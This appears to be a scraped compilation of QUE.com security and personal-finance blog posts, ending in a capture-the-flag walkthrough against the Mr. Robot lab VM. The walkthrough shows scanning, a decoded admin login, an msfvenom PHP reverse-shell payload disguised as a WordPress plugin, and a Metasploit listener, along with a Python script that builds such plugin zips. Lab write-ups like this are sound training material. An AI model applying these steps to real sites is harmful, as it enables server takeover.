DHS Statement on ongoing ransomware attacks - QUE.com

WASHINGTON – The Department of Homeland Security is aware of reports of ransomware known as WannaCry affecting multiple global entities.  Ransomware is a type of malicious software that infects a computer and restricts users’ access to it until a ransom is paid to unlock it.  Microsoft released a patch in March that addresses this specific vulnerability, and installing this patch will help secure your systems from the threat. Individual users are often the first line of defense against this and other threats, and we encourage all Americans to update your operating systems and implement vigorous cybersecurity practices at home, work, and school.
These practices include:
- Update your systems to include the latest patches and software updates.
- Do not click on or download unfamiliar links or files in emails.
- Back up your data to prevent possible loss, whether you are at a family computer or company data.
We are actively sharing information related to this event and stand ready to lend technical support and assistance as needed to our partners, both in the United States and internationally.  DHS has a cadre of cybersecurity professionals that can provide expertise and support to critical infrastructure entities.
DHS also leads the federal government’s efforts to protect civilian executive branch agency systems and networks. In partnership with each agency’s Chief Information Officer we are ensuring our own networks are protected against the threat.
For more information, DHS has previously released information on best practices to address ransomware. That information is available on our website at https://www.us-cert.gov/security-publications/Ransomware
Source: Department of Homeland Security
At QUE.com and partners, we have weekly and monthly schedules to check the security posture of our web servers and services. We also check our network of websites daily and apply updates as needed to keep them up, safe and secure.
Sometimes it is inconvenient to apply an extra layer of security because of the added step, but this is the reason why: we don't want to be one of the victims of a cyber attack.
As of writing this email, the sad part is that 20+ victims have already paid in bitcoin. They have no assurance that they will get their data back anyway, and there are absolutely no refunds.
Keep in mind: once a hacker owns your computer, it is no longer yours.
If you spot a ransomware incident, take a screenshot of their bitcoin address so we can track their activity.

Source: Que.com

How to improve your credit score

Keys to a Higher Credit Score
Credit scores provide a snapshot of your financial health. Your credit score can affect everything from credit card limits to loans to your ability to rent an apartment or buy a home. A high credit score can indicate to lenders that you are likely more credit worthy while a low credit score can suggest you may be a loan risk.
How to improve your score
There are a few things you can do to improve your credit score over time. Reducing your utilization percentage helps keep your credit score up. Always paying bills when they’re due, keeping a modest balance on your credit cards and paying more than the minimum due each month will help with your credit utilization.
Build your score for the future. There are 4 key things you should do to grow your credit score for long-term credit health.
1. Pay your bills on time
Paying your bills on time accounts for 35 percent of your credit score. Stay on top of your bills by creating a calendar for tracking when your bills are due. You can also enroll in auto bill payments with online banking tools to avoid paying bills late.
2. Don’t max out your credit
Keeping your account balances low can help raise your credit scores. Your credit utilization ratio is a major factor when determining your score. You can estimate this ratio for each of your accounts by dividing the amount you owe on each account by the amount of the credit line.
3. Keep track of length of credit history
The length of your credit history accounts for 15 percent of your scores. You should open and maintain one or two major credit cards. Don’t close accounts, particularly those that you’ve had for a longer time. Maintaining accounts in good standing for an extended period of time is an indicator that you’re responsible with your credit.
4. Manage new credit and types of credit
10 percent of your FICO score is based on new credit. Opening multiple accounts within a short time can signal financial problems. A mix of credit types, new and old, is preferable to having only one type of credit. Credit cards, education loans, vehicle loans and home loans are examples of types of credit.
Thank you, LendingTree, for sharing these credit tips.

Gmail Phishing Attack

Another day, another email phishing attack, this one targeting Gmail users’ accounts. Last Tuesday, May 3, a phishing email designed to trick users into giving up access to their Gmail accounts started showing up in targets’ inboxes. The first captured image below is an example of the Gmail phishing email. When a user clicks the “Open in Docs” link, the attacker gains access to the user’s Gmail account.
[Image: 20170503.Gmail.PhishingAttack1]
It did not stop there: this phishing attack also behaved as a “worm,” sending itself to all of the affected user’s contacts. The second captured image is an example of an email coming from an infected user’s @gsa.gov contact. You might receive a similar email coming from different email addresses.
[Image: 20170503.Gmail.PhishingAttack]
Note the recipient email address, “hhhhhhhhhhh@mailnator.com”; I hope this is reason enough not to open or read this message. Delete it right away. If you clicked the link and entered your Gmail credentials, please continue reading to learn how to perform a Google security check-up.
Here’s how to check your Gmail account.
  • Open a new browser. I highly recommend using a modern browser, e.g. Edge, Google Chrome or Firefox, because they are equipped with safe-browsing features that protect you by blocking malicious sites and links.
  • Log in to your Gmail account. Check the apps connected to your Gmail account here (https://myaccount.google.com/u/1/permissions?pli=1). Review and revoke any connection you don’t need or don’t recognize.
  • Go to the Google Security Check-up (https://myaccount.google.com/secureaccount) to check your account.
I hope that helps. Safe surfing.
Source: QUE.com

Hard VS Soft credit pulls

I’m looking for a mortgage lending company to loan me money so I can purchase a small house. So, I checked LendingTree.com to get some ideas. And one day I received this email, I guess one of their newsletters regarding credit tips, “Some vital info about your credit score,” and I think it is very useful to new home buyers like me.
Soft pulls happen when you:
  • Check your own score – you can do this often! It doesn’t affect your score!
  • Get free loan offers
  • Receive a loan pre-qualification
  • Experience an employer background check
  • Receive pre-approved credit card offers in the mail
  • Get your LendingTree credit scores
These won’t adversely affect your credit score.
Hard pulls happen when you apply for a:
  • New credit card
  • Home mortgage
  • Auto Loan
  • Refinance of your home mortgage
  • Home equity line of credit
  • Store credit card
  • Checking or savings account
These can lower your credit score by quite a few points.
What hurts your credit score the most: multiple hard pulls over a long period.
Limit your hard-pull credit inquiries. While hard inquiries are necessary to receive credit, it is important to understand how they work. All inquiries on your credit report within a 14-day period count as one inquiry ONLY IF you’re shopping for one of the following items: a home mortgage, home refinance, home equity loan or auto loan. Be mindful if you are tempted to open more than one kind of credit account, like a home mortgage and an auto loan, or a home mortgage and a new credit card, in that same period. Each will count as a separate inquiry and could impact your score.
Who tracks this info? The most important credit bureaus do. Don’t let your score go down! Avoid getting too many hard pulls at once.
  • fairIsaac
  • MyFico
  • TransUnion
  • Experian
  • Equifax


Decluttering Your Digital Life by QUE.com

I received this Friends newsletter today from the Department of Homeland Security, and I think it is very useful information to share. So here you go, and I hope you find it useful as well.
Start fresh this spring – online and offline. In addition to the traditional tasks on your spring cleaning list like tidying the closet and washing the windows, take time to create a “digital spring cleaning” list as well.
What exactly does a “digital spring cleaning” entail?
A digital spring cleaning means taking control of your digital life and the information that you share online. Similar to regular cleaning or tidying one’s home, it might seem like a daunting task at first. In reality, just a few simple steps can make a big difference in helping protect yourself online.
The Department of Homeland Security recommends that you incorporate these cyber tips into your spring cleaning routine this year.
  • Clean your machine. Update the security software on all of your devices that connect to the Internet.  Keeping the software on your devices up to date will prevent attackers from taking advantage of known vulnerabilities. Also review the applications you have downloaded. If you no longer use a particular app, delete it. It’ll not only free up storage space on your device, but it will also remove permissions that app has to potentially gather your information. 
  • Turn on multi-factor authentication. Enable stronger authentication on your online banking and email accounts. Turning on a two-factor authentication, such as a PIN sent to your mobile device, helps verify a user has authorized access to an account. For more information about authentication, visit the Lock Down Your Login Campaign at www.lockdownyourlogin.com.
  • Tidy your online reputation. Review your social media accounts and delete old photos or posts that may no longer represent who you are. As you go through your online posts, think about how they might influence others’ opinions of you. Also take the time to review the privacy settings on your online accounts. Take advantage of the privacy settings offered by major online apps and websites by limiting the amount of people who can see the information you share.
Visit and download the National Cyber Security Alliance’s “Digital Spring Cleaning Checklist” for more steps to clean up your online life.
For more tips on how to stay safe online, please visit the Department of Homeland Security’s Stop.Think.Connect. Campaign at www.dhs.gov/stopthinkconnect.

Source: Que.com

Professions Most Vulnerable to Cyber Hacks

Whenever you are in a profession that deals with highly confidential subject matter, you are going to be just as highly vulnerable to leaks and hacks. Sometimes this is nefarious in nature, as there are those who would like to be privy to the ‘secret’ details of someone else’s life, and sometimes those leaks are just for the sheer fun of it by a sick mind. Anyone in the field of social work or mental health will be vulnerable to these kinds of attacks because of the very nature of what they do: they deal with the thoughts and emotions of other human beings who may have been victimized in the past. For this reason, the following professions should take extra precautions to guard any data entered or stored on their computers.
First – A Bit of Cyber Security Advice
Before talking about a few of the professions most vulnerable to cyber hacks, it might be wise to give a bit of advice on keeping your computers as secure as possible. Password-protect any devices you will be using in the field and make sure those passwords are of the highest strength. Long, multi-character passwords are best, so that if anyone gains access to your laptop or iPad, they will not be able to see any files you’ve saved locally.
Social Workers Are Prime Targets
Anyone employed in the field of social work will be privy to some of the most personal information their clients are willing to share. As a result, it is an ethical and legal obligation of the social worker to keep that information strictly confidential. What happens in the case of a county social worker, for example, who is already working in the field but pursuing a master’s in social work online? He or she will undoubtedly be taking that ever-present laptop wherever they go, and if there are any files on it that could damage the well-being of a client, keeping it unsecured is a breach of professional conduct.
CPS Workers Who Deal with Abused Children
Although a branch of social work, a CPS worker may have obtained that M.S.W. online and, as a result, is now a field agent within the department. This type of social worker will typically be out investigating reports of child abuse, and how better to document each visit than with a mobile device that can take evidentiary photos and store text notes of what the caseworker observed on the visit? Again, cyber security is an absolute must when working in the field.
Anyone can gain access to that device and what if it is an estranged spouse trying to learn where the mother and children are being kept in a safe facility? You never know who would want to find those abused children or battered women, so cyber security is essential. Any transmissions to your database from your mobile device may be hacked if you don’t have great security on deck. Whether working in the field or from the office, any profession that deals with the mental or emotional well-being of their clients will be a prime target for being hacked and are, indeed, ethically responsible for ensuring confidentiality. Stay secure with the latest software, protecting your clients and yourself at the very same time.
Image by Retune.com

Vault 7: CIA Hacking Tools Revealed | Wikileaks

If you're in the cyber security business, you will be a lot busier in the days to come securing your network and your customers. WikiLeaks has revealed CIA hacking tools.
Today, Tuesday 7 March 2017, WikiLeaks begins its new series of leaks on the U.S. Central Intelligence Agency. Code-named "Vault 7" by WikiLeaks, it is the largest ever publication of confidential documents on the agency.
The first full part of the series, "Year Zero", comprises 8,761 documents and files from an isolated, high-security network situated inside the CIA's Center for Cyber Intelligence in Langley, Virginia. It follows an introductory disclosure last month of CIA targeting of French political parties and candidates in the lead-up to the 2012 presidential election.
Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized "zero day" exploits, malware remote control systems and associated documentation. This extraordinary collection, which amounts to more than several hundred million lines of code, gives its possessor the entire hacking capacity of the CIA. The archive appears to have been circulated among former U.S. government hackers and contractors in an unauthorized manner, one of whom has provided WikiLeaks with portions of the archive.

KING of Tanks - MultiPlayer Games

Welcome to KING of Tanks Multiplayer Game, Que.com's latest game.
[Image: kingoftanks-com-01]
This will be our reference project for future KING of Tanks multiplayer game improvements. We hope you enjoy playing games with us. Keep in mind this game is FREE; you don't have to pay to play.
Things to remember: you can easily come back to this page through the following links for quick access. We want you to bookmark this page :).
Continue reading at the KING of Tanks Multiplayer Game web page for more information.

KING.NET Email Address

Manage your business, not your e-mail. We provide reliable uptime, global scalability, and world-class security powered by Google Apps. Doing business in the computing cloud means you’re always current: no more maintenance, upgrades, security patches or hassles. You can re-allocate your in-house IT to other productive projects.
Got your email @KING.NET? Please go to http://mail.king.net and log in with your email address, password and PIN. For your email security, it is highly recommended that you enable Two-Factor Authentication to access your email.
Your email is accessible using the following:
  • Any modern internet browser, e.g. Internet Explorer (IE), Google Chrome, Mozilla Firefox, Safari and others.
  • Smart phones, e.g. iPhone, Android, etc.
Examples of email addresses to register: please note that an email address @KING.NET is a premium identity for a very important person like yourself. You can only get your own email @KING.NET here. Some examples of premium email addresses using @KING.NET:
  • Saudi@King.net
  • Charles@King.net
  • Royal@King.net
  • James@King.net
  • Peter@King.net
  • and of course your own Name@KING.NET

Enable Two-Factor Authentication to protect your Email Account.

Retune.com - Email Security
Your email address is the center of your security world. It is highly recommended that you enable Two-Factor Authentication to minimize the risk of someone accessing your email through a spear phishing attack, discovering caches of passwords in your mailbox, and other related email attacks. As an example, the attacker of the DNC email used a simple password reset request sent through a spear phishing attack and was able to gain access to the email account and password. With Two-Factor Authentication enabled, another layer of security, the verification code, would be required, stopping the attack.

Two-Factor Authentication or 2-Step Verification adds an extra layer of security to your email account by requiring you to enter a verification code in addition to your username and password when signing in. It helps protect a user's account from unauthorized access should someone manage to obtain their password. Even if a password is cracked, guessed, or otherwise stolen, an attacker can't sign in without access to the user's additional verification. This verification can be in the form of codes that only the user can obtain via their own mobile phone.

Requirement. To use Two-Factor Authentication you need a mobile phone that can receive the verification code via text message or phone call. Alternatively, the Google Authenticator mobile app generates the verification code on the device itself.

How to enable Two-Factor Authentication?
Retune.com - Cyber Security
Using Gmail or a white-label domain name:
  • Log in to your email: go to https://www.gmail.com and enter your email address and password.
  • Click your name icon (upper right corner), then click My Account.
Google provides a detailed step-by-step procedure for enabling it. You will see Security Checkup; click Get Started and follow the steps.
  1. Check your recovery information.
  2. Check your connected devices.
  3. Check your account permissions.
  4. Check your app passwords. These are separate passwords created for MS Outlook or other email reader applications.
  5. Check your Two-Factor settings.

Have a safe computing experience.

Source: Que.com

FIXED. Fatal error: Call to a member function do_all_hook() on a non-object in /home/public_html/wp-includes/plugin.php on line 837

The latest version of WordPress is v4.7. It is always recommended to upgrade to the latest release to minimize vulnerabilities (exposure) and to get improvements in the content management system.
Always back up before you upgrade: copy your WordPress files and download the database. This gives you a way to roll back in case you run into an "unknown" issue; upgrades are not always perfect.
During my upgrade of one of my customers' websites to v4.7, I got this error:
Fatal error: Call to a member function do_all_hook() on a non-object in /home/public_html/wp-includes/plugin.php on line 837
A quick fix is to re-upload the plugin.php file from my old backup to the /wp-includes folder. This works!
But I wanted to use the latest plugin.php file, not the old copy. I searched the internet to find out whether anyone had encountered the same error when upgrading to the latest version of WordPress. No surprise: the issue and alternative solutions had already been discussed.
I found the solution. I disabled the file /wp-content/object-cache.php by renaming it to object-cache.DISABLED.php (deleting it works as well). I don't know the purpose of this file at this point.
I re-uploaded the latest plugin.php to the /wp-includes/ folder, tested my website and was happy with the result.
I hope this helps.
Source: Que.com

A new phishing attack targeting Office 365 business email users - EM @QUE.com

A new phishing attack targeting Office 365 business email users was found using Punycode to go undetected by both Microsoft’s default security and desktop email filters, Avanan security researchers warn.
The attack is meant to steal Office 365 credentials and abuses a flaw in how the Office 365 anti-phishing and URL-reputation security layers handle Punycode. The attack starts with a fake FedEx email that includes benign-looking URLs meant to take users to a malicious website. See the image below.
[Image: office-365-business-users-targeted-in-punycode-based-phishing]
By using Punycode and leveraging this flaw in the phish-detection engine, the URL effectively resolves to two different domains: one safe, which is what Office 365 checks, and the other malicious, which is what the browser follows.
The underlying issue is that Office 365’s default security treats the domain as plain ASCII when verifying whether it is legitimate. Because all modern browsers support Unicode, the address is translated to its Unicode form when opened in the browser. That address is malicious and presents users with a fake Office 365 login page in an attempt to steal their credentials.
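The mismatch described above is that the filter judged the ASCII (xn--) string while the browser showed its Unicode decoding. The added example below, which is not Avanan's or Microsoft's code, shows what a URL-reputation check should do instead: decode Punycode first, then look at the scripts of the letters inside each label, because a label that mixes, say, Latin and Cyrillic letters is the signature of a homograph. Python's standard idna codec does the encoding and decoding; the `analyze` function, its verdict labels and the sample hostname (a Latin brand name with one letter swapped for Cyrillic U+0430) are constructed for this example.

```python
import unicodedata


def to_unicode(hostname: str) -> str:
    """Normalize a hostname to its Unicode form: xn-- labels are Punycode-decoded
    (what the browser's address bar shows) and plain ASCII labels pass through.
    Accepts either an already-encoded or a raw Unicode hostname."""
    return hostname.encode("idna").decode("idna")


def to_ascii(hostname: str) -> str:
    """Encode to the Punycode (xn--) form that mail filters and DNS actually see."""
    return hostname.encode("idna").decode("ascii")


def scripts_in(label: str) -> set:
    """Writing systems used by the letters of one DNS label, e.g. {'LATIN', 'CYRILLIC'},
    read from the first word of each character's Unicode name."""
    return {unicodedata.name(ch).split()[0] for ch in label if ch.isalpha()}


def analyze(hostname: str) -> dict:
    """Classify a hostname the way a reputation layer should: decode Punycode before
    judging it, then flag any single label that mixes scripts, the hallmark of a
    homograph (one Cyrillic letter dropped into a Latin brand name). An all-one-script
    IDN is legitimate in many markets, so it only gets 'review'. The verdict labels
    are this example's own, not an Office 365 setting."""
    decoded = to_unicode(hostname)
    ascii_form = to_ascii(decoded)
    is_idn = any(lbl.startswith("xn--") for lbl in ascii_form.lower().split("."))
    mixed = any(len(scripts_in(lbl)) > 1 for lbl in decoded.split("."))
    return {
        "ascii": ascii_form,
        "unicode": decoded,
        "is_idn": is_idn,
        "mixed_script": mixed,
        "verdict": "block" if mixed else ("review" if is_idn else "allow"),
    }


if __name__ == "__main__":
    # Constructed sample: "paypal.com" with the first 'a' replaced by Cyrillic U+0430.
    for host in ["fedex.com", "p\u0430ypal.com"]:
        print(analyze(host))
```

The key line is `to_unicode` being called before anything else: a filter that string-matches the xn-- form against an allow-list or a brand list sees nothing suspicious, while the decoded form reveals the look-alike. Browsers apply a similar mixed-script rule when deciding whether to display the Unicode form or fall back to the raw xn-- label.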
How to protect against phishing email or spear phishing email intended for the big fish in our organization?
  • Do not click any link asking you to reset your password. Make it a habit: never click on a link from your email :)
  • Use Two-Factor Authentication. I highly recommend using two-factor authentication wherever it is available: bank accounts, social networks, e.g. LinkedIn, Facebook, etc. (Two-factor authentication is not available to Kiosk Email users.)
Phishing email is the same old method: a malicious person asks you to change your bank account password, claims your bank account was compromised or money was deposited into it, announces a UPS delivery, a social media notification, free Redskins tickets, free Washington Wizards tickets, and many other variations of fake email. According to PhishMe, 91% of cyber attacks start with a phishing email. The hacking of high-profile staff at the DNC was through phishing emails. This method is cheap, hard to detect, and easy to deploy.
Security awareness on everyone's part is important to minimize our exposure.
What is the worst-case scenario if you click on a “bait” link?
  • The malicious user will have access to your accounts, for example your email, social media, bank accounts, etc.
  • Or the malicious user will have full control of your computer through a “reverse shell,” where they can see all your files, install a back-door program to get back in, use your webcam, use your computer as a bot in a DDoS attack, anything they want.
What to do if you accidentally click a “bait” link?
  • When you click a “bait” link or open a bad attachment, you may think nothing happened and move on with your routine tasks. But the malicious code has already executed in the background; you will not notice it, because that is how it is designed. Don’t ignore this simple mistake: reboot your workstation right away, which will end the session initiated by clicking the bad link.
  • Scan your workstation with your anti-virus/anti-malware software.
  • Report to your immediate supervisor or post in the comments below. Our community is willing to help.
The Center for Development of Security Excellence (CDSE.edu) website provides a fun way to test your awareness of phishing scams. Go to http://www.cdse.edu/shorts/cybersecurity.html#, watch the “Phishing Scams: Avoid the Bait” video and have fun.
Reference links:

CTF – Hacking Mr. Robot by EM @QUE.com

Another learning experience to improve my penetration testing skills: hacking the Mr. Robot virtual machine as my target machine.
My private network for this penetration testing exercise:
  • Kali Linux, my tool to exploit the target machine. IP address: 192.168.159.131
  • Mr. Robot, my target machine. IP address: unknown
[Image: que-com-mr-robot]
Let's begin. My objective is to find the three hidden keys.
I have no knowledge of my target machine's (Mr. Robot) IP address, so let me begin by running nmap. Of course, you can also use other network discovery tools to scan your network; I prefer nmap because it is already available on my pentest machine.
root@kali:~# nmap -T4 192.168.159.0/24
Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-30 10:41 EST
Nmap scan report for 192.168.159.131
Host is up (0.00037s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https
MAC Address: 00:0C:29:F8:73:37 (VMware)
Nmap scan report for 192.168.159.254
Host is up (0.00015s latency).
All 1000 scanned ports on 192.168.231.254 are filtered
MAC Address: 00:50:56:F4:2B:CA (VMware)
Nmap scan report for 192.168.159.130
Host is up (0.0000050s latency).
All 1000 scanned ports on 192.168.159.131 are closed
Nmap done: 256 IP addresses (3 hosts up) scanned in 39.00 seconds
root@kali:~#
I discovered my target machine's IP address, 192.168.159.130, and its open ports. That's basic enumeration: scanning my private network.
Ports 80 and 443 are interesting places to start poking around. Let's see what's on this website. I'm calling Firefox directly from the command prompt; of course, you can simply click the Firefox icon and enter the IP address of the web server. It's cool to use the CLI to run a command.
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/
The website started loading JavaScript that looks like a Linux environment.
[Image: que-com-ctp-mr-robot-webpage]
Opening the source code, I got this fancy "Your are not alone".
[Image: que-com-ctp-mr-robot-webpage-javascript]
Checking to see if I can use any of this information to hack the Mr. Robot box.
Nothing so far. I will come back to this webpage later on.
Let's try using "dirbuster" to get to know our target website.
root@kali:~/KING.NET/mr.robot# dirb http://192.168.159.130/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Wed Nov 30 19:18:31 2016
URL_BASE: http://192.168.159.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.159.130/ ----
==> DIRECTORY: http://192.168.159.130/0/
==> DIRECTORY: http://192.168.159.130/admin/
+ http://192.168.159.130/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.159.130/audio/
==> DIRECTORY: http://192.168.159.130/blog/
==> DIRECTORY: http://192.168.159.130/css/
+ http://192.168.159.130/dashboard (CODE:302|SIZE:0)
+ http://192.168.159.130/favicon.ico (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/feed/
==> DIRECTORY: http://192.168.159.130/image/
==> DIRECTORY: http://192.168.159.130/Image/
==> DIRECTORY: http://192.168.159.130/images/
+ http://192.168.159.130/index.html (CODE:200|SIZE:1077)
+ http://192.168.159.130/index.php (CODE:301|SIZE:0)
+ http://192.168.159.130/intro (CODE:200|SIZE:516314)
==> DIRECTORY: http://192.168.159.130/js/
http://192.168.159.130/license (CODE:200|SIZE:309)
http://192.168.159.130/login (CODE:302|SIZE:0)
+ http://192.168.159.130/page1 (CODE:301|SIZE:0)
+ http://192.168.159.130/phpmyadmin (CODE:403|SIZE:94)
+ http://192.168.159.130/rdf (CODE:301|SIZE:0)
+ http://192.168.159.130/readme (CODE:200|SIZE:64)
http://192.168.159.130/robots (CODE:200|SIZE:41)
http://192.168.159.130/robots.txt (CODE:200|SIZE:41)
+ http://192.168.159.130/rss (CODE:301|SIZE:0)
+ http://192.168.159.130/rss2 (CODE:301|SIZE:0)
+ http://192.168.159.130/sitemap (CODE:200|SIZE:0)
http://192.168.159.130/sitemap.xml (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/video/
==> DIRECTORY: http://192.168.159.130/wp-admin/
+ http://192.168.159.130/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-content/
+ http://192.168.159.130/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.159.130/wp-includes/
+ http://192.168.159.130/wp-links-opml (CODE:200|SIZE:227)
+ http://192.168.159.130/wp-load (CODE:200|SIZE:0)
http://192.168.159.130/wp-login (CODE:200|SIZE:2627)
--- snip --- dirbuster still running.
I had to cancel it. I think I have enough information to start digging. There is a lot of information in these dirb results. I now know some sub-folders, e.g. /admin, /blog, /license, /phpmyadmin, /wp-admin, /wp-login, /wp-config, etc. I think the Mr. Robot box website is using the WordPress content management system. Nice.
Checking the following sub-folder:
root@kali:~/KING.NET/mr.robot# firefox http://192.168.159.130/license
A webpage with this content: "what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?"
Continue scrolling down to the end of the page to see this text, "do you want a password or something?", and this code.
ZWxsaW90OkVSMjgtMDY1Mgo=
I copied it into nano, saved it as 1stdump.txt and checked for base64 with base64 -d -i 1stdump.txt.
root@kali:~/KING.NET/mr.robot# nano 1stdump.txt
root@kali:~/KING.NET/mr.robot# base64 -d -i 1stdump.txt
elliot:ER28-0652
root@kali:~/KING.NET/mr.robot#
Looks like we have elliot:ER28-0652, a username and maybe a password. Let's try logging in to the Mr. Robot virtual machine to see if this account information works.
No luck! Continue hacking the box :(.
Let me try using this account at http://192.168.159.130/wp-admin. Success!
[Image: que-com-ctp-mr-robot-wordpress]
Checking the users, the "elliot" username is also an Administrator. Jackpot! There is another user, micho05654, with the Subscriber role. I will ignore this subscriber and focus on elliot as administrator.
[Image: que-com-ctp-mr-robot-wordpress-admin]
Now I can control this box from here. Since I have Administrator rights, I'll exploit the WordPress CMS through a reverse shell. Let the Kali virtual machine do the work for us. Click Applications, Exploitation Tools, then MSF Payload. It opens the MSFVenom Payload Creator in a new terminal window. I ran the command below.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
This command reads as: run the msfpc payload creator with type php; the attacker's IP address, 192.168.159.131, and port 443; msf for a cross-platform shell with the full power of Metasploit; reverse so that the target connects back to the attacker; stageless for a complete stand-alone payload; and tcp as the standard method of connecting back. I hope that makes sense; otherwise type --help for more details.
root@kali:~# msfpc php 192.168.159.131 443 msf reverse stageless tcp
[*] Msfvenom Payload Creator (MPC v1.4.3)
[i] IP: 192.168.159.131
[i] PORT: 443
[i] TYPE: php (php/meterpreter_reverse_tcp)
[i] CMD: msfvenom -p php/meterpreter_reverse_tcp -f raw \
--platform php -e generic/none -a php LHOST=192.168.159.131 LPORT=443 \
> '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] php meterpreter created: '/root/php-meterpreter-stageless-reverse-tcp-443.php'
[i] MSF handler file: '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[i] Run: msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
[?] Quick web server (for file transfer)?: python -m SimpleHTTPServer 8080
[*] Done!
After running the MSFVenom Payload Creator, the program generated two files:
  1. php-meterpreter-stageless-reverse-tcp-443.php
  2. php-meterpreter-stageless-reverse-tcp-443-php.rc
It also printed the command that starts the matching handler: "msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'". Everything is ready for me to execute.
root@kali:~# msfconsole -q -r '/root/php-meterpreter-stageless-reverse-tcp-443-php.rc'
My listening (attacker) machine is ready and waiting for the connection.
resource (/root/php-meterpreter-stageless-reverse-tcp-443-php.rc)> run -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.159.131:443
[*] Starting the payload handler...
msf exploit(handler) >
The MSFVenom Payload Creator also suggested a quick web server for file transfer (python -m SimpleHTTPServer 8080), but in this scenario I will not use it, because I already have administrator access to the WordPress site. All I need to do is install my payload through WordPress as a plugin. At this point I could wreak havoc on the WordPress installation by deleting content, but the main goal is to own the box (pwn to root, or pwn 2 r00t).
I edit the php file to add a plugin header so WordPress recognises it as a plugin. Here's the updated php file (the generated payload line is truncated here).
/*
Plugin Name: Pwn-to-Root
Plugin URI: http://www.king.net
Description: A demo using WordPress to establish a reverse shell.
Author: EM @ KING.NET
Version: v1.0
Author URI: http://www.king.net
*/
//<?php if (!isset($GLOBALS['channels'])) { $GLOBALS['channels'] = array(); } if (!isset$
Then zip the php file.
root@kali:~# zip php-meterpreter-stageless-reverse-tcp-443.zip php-meterpreter-stageless-reverse-tcp-443.php
adding: php-meterpreter-stageless-reverse-tcp-443.php (deflated 76%)
root@kali:~#
The payload is now ready. I can upload the zip file as a plugin from the WordPress management console. Go back to the WordPress admin page: under Plugins, click Add New, then Upload Plugin. Browse to the zip file, click Install Now, and wait for the upload to complete. On the defender's side this is exactly what define('DISALLOW_FILE_MODS', true); in wp-config.php prevents: it removes plugin and theme upload, installation and editing from the dashboard, so a stolen administrator password no longer gives code execution by this route.
[Screenshot: que-com-ctp-mr-robot-wordpress-activateplugin]
I've already started the listener (above), so all I need to do is click Activate Plugin: WordPress includes the plugin's PHP file, which runs the payload and opens the reverse connection. When I check my listening machine, I see our session.
[*] Meterpreter session 1 opened (192.168.159.131:443 -> 192.168.159.130:39959) at 2016-12-03 23:39:58 -0500
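How the plugin trick works, as an added example that is not part of the original post: WordPress decides whether a PHP file is a plugin by reading its first 8 KiB and looking for a "Plugin Name:" header line, which is why a comment block glued to the front of the msfvenom output is enough. The script below wraps a PHP file the same way, builds the zip, re-reads it with the same header regex WordPress uses in get_file_data(), and checks a wp-config.php snippet for the DISALLOW_FILE_MODS switch that closes this route. The plugin name, slug, stand-in payload body and config snippets are constructed for the demo; the regex and the constant are WordPress's own.

```python
"""Wrap a PHP file as a WordPress plugin zip, then look at it the way WordPress does.

Added example, not code from the original post. Names, paths and the payload
stand-in are constructed; the header regex and DISALLOW_FILE_MODS are real
WordPress behaviour.
"""
import io
import re
import zipfile
from typing import Optional

WP_HEADER_BYTES = 8192  # get_file_data() reads only the first 8 KiB of the file

PLUGIN_HEADER = """/*
Plugin Name: {name}
Description: {description}
Version: 1.0
*/
"""

# Constructed stand-in for the msfvenom output; a real payload would follow.
SAMPLE_PAYLOAD = "<?php /* payload body would go here */ echo 'hello';"


def wrap_as_plugin(payload_php: str, name: str, description: str = "demo") -> str:
    """Prepend the header WordPress needs in order to list the file as a plugin."""
    return PLUGIN_HEADER.format(name=name, description=description) + payload_php


def build_plugin_zip(plugin_source: str, slug: str) -> bytes:
    """Zip the plugin as <slug>.php at the archive root, as the post did by hand."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}.php", plugin_source)
    return buf.getvalue()


# Same pattern WordPress uses: comment characters may precede the header line.
_PLUGIN_NAME_RE = re.compile(r"^[ \t\/*#@]*Plugin Name:(.*)$", re.IGNORECASE | re.MULTILINE)


def plugin_name_from_zip(zip_bytes: bytes) -> Optional[str]:
    """Return the Plugin Name WordPress would display for this upload, or None."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.endswith(".php"):
                continue
            head = zf.read(info).decode("utf-8", "replace")[:WP_HEADER_BYTES]
            match = _PLUGIN_NAME_RE.search(head)
            if match:
                return match.group(1).strip()
    return None


_DISALLOW_RE = re.compile(
    r"define\(\s*['\"]DISALLOW_FILE_MODS['\"]\s*,\s*(true|false)\s*\)", re.IGNORECASE
)


def file_mods_disallowed(wp_config: str) -> bool:
    """True when wp-config.php blocks plugin upload/install/edit from the dashboard."""
    match = _DISALLOW_RE.search(wp_config)
    return bool(match) and match.group(1).lower() == "true"


if __name__ == "__main__":
    archive = build_plugin_zip(wrap_as_plugin(SAMPLE_PAYLOAD, "Pwn-to-Root"), "pwn-to-root")
    print("WordPress would list this as:", plugin_name_from_zip(archive))
    print("Upload blocked by config:", file_mods_disallowed("define('DISALLOW_FILE_MODS', true);"))
```

The header is parsed out of a comment, so the PHP never has to be valid for WordPress to list the plugin; execution happens only when the file is included on activation. That is why a hardened wp-config.php with DISALLOW_FILE_MODS is the control that matters here, not a scan of the uploaded file.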
From the listening machine, type help to list all available commands. Type "sessions" to list the active sessions.
msf exploit(handler) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
